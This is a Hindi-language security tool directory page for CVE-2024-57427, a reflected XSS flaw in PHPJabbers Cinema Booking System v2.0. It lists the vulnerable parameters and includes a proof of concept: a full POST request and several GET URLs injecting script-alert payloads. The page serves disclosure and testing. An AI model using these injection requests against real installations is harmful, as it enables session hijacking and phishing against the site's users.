Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-57427 — CVE-2024-57427: PHPJabbers Cinema Booking System v2.0 रिफ्लेक्टेड XSS की चपेट में है, जिससे सत्र अपहरण और फ़िशिंग हमले संभव हो सकते हैं। | Kitploit
उपकरण/GitHubGitHub/ahrixia/cve-2024-57427
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubahrixia/cve-2024-57427

CVE-2024-57427

CVE-2024-57427: PHPJabbers Cinema Booking System v2.0 रिफ्लेक्टेड XSS की चपेट में है, जिससे सत्र अपहरण और फ़िशिंग हमले संभव हो सकते हैं।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-57427 - परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS)

PHPJabbers Cinema Booking System v2.0 परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) के प्रति संवेदनशील है। कई एंडपॉइंट उपयोगकर्ता इनपुट को अनुचित तरीके से संभालते हैं, जिससे पीड़ित के ब्राउज़र में दुर्भावनापूर्ण स्क्रिप्ट निष्पादित हो सकती हैं। हमलावर सत्र कुकीज़ चुराने या फ़िशिंग हमले करने के लिए दुर्भावनापूर्ण लिंक तैयार कर सकते हैं।

संवेदनशील पैरामीटर:

प्रभावित POST अनुरोध फ़ंक्शन

  • OPTIONS > BOOKING FORM:
    • value-enum-o_currency
    • value-enum-o_booking_status
    • value-enum-o_payment_status
    • value-enum-o_payment_disable
    • value-enum-o_allow_paypal
    • value-enum-o_allow_authorize
    • value-enum-o_allow_cash
    • value-enum-o_allow_creditcard
    • value-enum-o_allow_bank
  • OPTIONS > BOOKING:
    • value-enum-o_bf_include_title
    • value-enum-o_bf_include_name
    • value-enum-o_bf_include_email
    • value-enum-o_bf_include_phone
    • value-enum-o_bf_include_company
    • value-enum-o_bf_include_address
    • value-enum-o_bf_include_country
    • value-enum-o_bf_include_state
    • value-enum-o_bf_include_city
    • value-enum-o_bf_include_zip
    • value-enum-o_bf_include_notes
    • value-enum-o_bf_include_captcha

प्रभावित GET अनुरोध फ़ंक्शन

  • locale
  • hide
  • theme

प्रभाव:

एक हमलावर पीड़ित के ब्राउज़र में मनमाना JavaScript कोड निष्पादित कर सकता है, जिससे डेटा चोरी, सत्र अपहरण और फ़िशिंग हमले संभव हो सकते हैं। यह भेद्यता उपयोगकर्ता सत्रों की सुरक्षा और अखंडता तथा संभावित रूप से स्वयं एप्लिकेशन से समझौता कर सकती है।

एक्सप्लॉइट - प्रूफ ऑफ कॉन्सेप्ट (POC)

परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS)

पेलोड: <script>alert(x)</script>

पूर्ण POST अनुरोध

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminOptions&action=pjActionUpdate HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: CinemaBooking=xxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 778

options_update=1&next_action=pjActionBookingForm&value-enum-o_bf_include_title=XXS1<script>alert(1)</script>&value-enum-o_bf_include_name=XXS2<script>alert(2)</script>&value-enum-o_bf_include_email=XXS3<script>alert(3)</script>&value-enum-o_bf_include_phone=XXS4<script>alert(4)</script>&value-enum-o_bf_include_company=XXS5<script>alert(5)</script>&value-enum-o_bf_include_address=XXS6<script>alert(6)</script>&value-enum-o_bf_include_country=XXS7<script>alert(7)</script>&value-enum-o_bf_include_state=XXS8<script>alert(8)</script>&value-enum-o_bf_include_city=XXS9<script>alert(9)</script>&value-enum-o_bf_include_zip=XXS10<script>alert(10)</script>&value-enum-o_bf_include_notes=XXS11<script>alert(11)</script>&value-enum-o_bf_include_captcha=XXS12<script>alert(12)</script>

पूर्ण GET अनुरोध

पेलोड: "><script>alert(x)</script> और "></script><script>alert(x)</script>

root@kitploit:~
http://127.0.0.1/CinemaBookingDev/preview.php?locale=1&hide=0&theme=theme2"><script>alert(1)</script>&selected_date=21-12-2024
http://127.0.0.1/CinemaBookingDev/preview.php?locale=1&hide=XXS1"></script><script>alert(1)</script>&theme=theme2&selected_date=21-12-2024
http://127.0.0.1/CinemaBookingDev/preview.php?locale=1se"></script><script>alert(1)</script>&hide=0&theme=theme2&selected_date=21-12-2024
http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionGetSeats&event_id=14&venue_id=2&date_time=15-12-2024 00:00&index=new_1492"><script>alert(1)</script>
टूल डाउनलोड करें